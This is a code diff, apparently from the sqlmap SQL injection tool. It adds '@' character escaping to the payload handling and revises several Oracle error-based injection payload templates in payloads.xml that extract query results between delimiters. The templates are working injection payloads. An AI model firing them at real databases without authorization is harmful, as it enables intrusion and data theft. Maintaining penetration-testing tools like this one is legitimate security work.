diff --git a/lib/core/agent.py b/lib/core/agent.py
index 2096ea990..82ecf07ee 100644
--- a/lib/core/agent.py
+++ b/lib/core/agent.py
@@ -213,6 +213,7 @@ class Agent:
payload = payload.replace("[RANDSTR1]", randStr1)
payload = payload.replace("[DELIMITER_START]", kb.misc.start)
payload = payload.replace("[DELIMITER_STOP]", kb.misc.stop)
+ payload = payload.replace("[AT_REPLACE]", kb.misc.at)
payload = payload.replace("[SPACE_REPLACE]", kb.misc.space)
payload = payload.replace("[DOLLAR_REPLACE]", kb.misc.dollar)
payload = payload.replace("[SLEEPTIME]", str(conf.timeSec))
diff --git a/lib/core/option.py b/lib/core/option.py
index e67c78c0c..a812df087 100644
--- a/lib/core/option.py
+++ b/lib/core/option.py
@@ -1463,6 +1463,7 @@ def __setKnowledgeBaseAttributes(flushAll=True):
kb.misc.delimiter = randomStr(length=6, lowercase=True)
kb.misc.start = ":%s:" % randomStr(length=3, lowercase=True)
kb.misc.stop = ":%s:" % randomStr(length=3, lowercase=True)
+ kb.misc.at = ":%s:" % randomStr(length=1, lowercase=True)
kb.misc.space = ":%s:" % randomStr(length=1, lowercase=True)
kb.misc.dollar = ":%s:" % randomStr(length=1, lowercase=True)
kb.misc.forcedDbms = None
diff --git a/lib/techniques/error/use.py b/lib/techniques/error/use.py
index 0f9dde4a0..233384e59 100644
--- a/lib/techniques/error/use.py
+++ b/lib/techniques/error/use.py
@@ -185,7 +185,7 @@ def __errorReplaceChars(value):
retVal = value
if value:
- retVal = retVal.replace(kb.misc.space, " ").replace(kb.misc.dollar, "$")
+ retVal = retVal.replace(kb.misc.space, " ").replace(kb.misc.dollar, "$").replace(kb.misc.at, "@")
return retVal
diff --git a/xml/payloads.xml b/xml/payloads.xml
index f18d0e740..40b37463e 100644
--- a/xml/payloads.xml
+++ b/xml/payloads.xml
@@ -1117,7 +1117,7 @@ Formats:
0
1
1
- AND [RANDNUM]=(SELECT UPPER(XMLType(CHR(60)||'[DELIMITER_START]'||(REPLACE(REPLACE(([QUERY]),' ','[SPACE_REPLACE]'),'$','[DOLLAR_REPLACE]'))||'[DELIMITER_STOP]'||CHR(62))) FROM DUAL)
+ AND [RANDNUM]=(SELECT UPPER(XMLType(CHR(60)||'[DELIMITER_START]'||(REPLACE(REPLACE(REPLACE(([QUERY]),' ','[SPACE_REPLACE]'),'$','[DOLLAR_REPLACE]'),'@','[AT_REPLACE]'))||'[DELIMITER_STOP]'||CHR(62))) FROM DUAL)
AND [RANDNUM]=(SELECT UPPER(XMLType(CHR(60)||'[DELIMITER_START]'||(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END) FROM DUAL)||'[DELIMITER_STOP]'||CHR(62))) FROM DUAL)
@@ -1335,9 +1335,9 @@ Formats:
2
1
2
- OR [RANDNUM]=(SELECT UPPER(XMLType(CHR(60)||'[DELIMITER_START]'||(REPLACE(([QUERY]),' ','[SPACE_REPLACE]'))||'[DELIMITER_STOP]'||CHR(62))) FROM DUAL)
+ OR [RANDNUM]=(SELECT UPPER(XMLType(CHR(60)||'[DELIMITER_START]'||(REPLACE(REPLACE(REPLACE(([QUERY]),' ','[SPACE_REPLACE]'),'$','[DOLLAR_REPLACE]'),'@','[AT_REPLACE]'))||'[DELIMITER_STOP]'||CHR(62))) FROM DUAL)
- OR [RANDNUM]=(SELECT UPPER(XMLType(CHR(60)||'[DELIMITER_START]'||(REPLACE((SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END) FROM DUAL),' ','[SPACE_REPLACE]'))||'[DELIMITER_STOP]'||CHR(62))) FROM DUAL)
+ OR [RANDNUM]=(SELECT UPPER(XMLType(CHR(60)||'[DELIMITER_START]'||(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END) FROM DUAL)||'[DELIMITER_STOP]'||CHR(62))) FROM DUAL)
[DELIMITER_START](?P<result>.*?)[DELIMITER_STOP]
@@ -1499,9 +1499,9 @@ Formats:
0
1,3
3
- (SELECT UPPER(XMLType(CHR(60)||'[DELIMITER_START]'||(REPLACE(([QUERY]),' ','[SPACE_REPLACE]'))||'[DELIMITER_STOP]'||CHR(62))) FROM DUAL)
+ (SELECT UPPER(XMLType(CHR(60)||'[DELIMITER_START]'||(REPLACE(REPLACE(REPLACE(([QUERY]),' ','[SPACE_REPLACE]'),'$','[DOLLAR_REPLACE]'),'@','[AT_REPLACE]'))||'[DELIMITER_STOP]'||CHR(62))) FROM DUAL)
- (SELECT UPPER(XMLType(CHR(60)||'[DELIMITER_START]'||(REPLACE((SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END) FROM DUAL),' ','[SPACE_REPLACE]'))||'[DELIMITER_STOP]'||CHR(62))) FROM DUAL)
+ (SELECT UPPER(XMLType(CHR(60)||'[DELIMITER_START]'||(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END) FROM DUAL)||'[DELIMITER_STOP]'||CHR(62))) FROM DUAL)
[DELIMITER_START](?P<result>.*?)[DELIMITER_STOP]
@@ -1620,9 +1620,9 @@ Formats:
0
2,3
1
- ,(SELECT UPPER(XMLType(CHR(60)||'[DELIMITER_START]'||(REPLACE(([QUERY]),' ','[SPACE_REPLACE]'))||'[DELIMITER_STOP]'||CHR(62))) FROM DUAL)
+ ,(SELECT UPPER(XMLType(CHR(60)||'[DELIMITER_START]'||(REPLACE(REPLACE(REPLACE(([QUERY]),' ','[SPACE_REPLACE]'),'$','[DOLLAR_REPLACE]'),'@','[AT_REPLACE]'))||'[DELIMITER_STOP]'||CHR(62))) FROM DUAL)
- ,(SELECT UPPER(XMLType(CHR(60)||'[DELIMITER_START]'||(REPLACE((SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END) FROM DUAL),' ','[SPACE_REPLACE]'))||'[DELIMITER_STOP]'||CHR(62))) FROM DUAL)
+ ,(SELECT UPPER(XMLType(CHR(60)||'[DELIMITER_START]'||(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END) FROM DUAL)||'[DELIMITER_STOP]'||CHR(62))) FROM DUAL)
[DELIMITER_START](?P<result>.*?)[DELIMITER_STOP]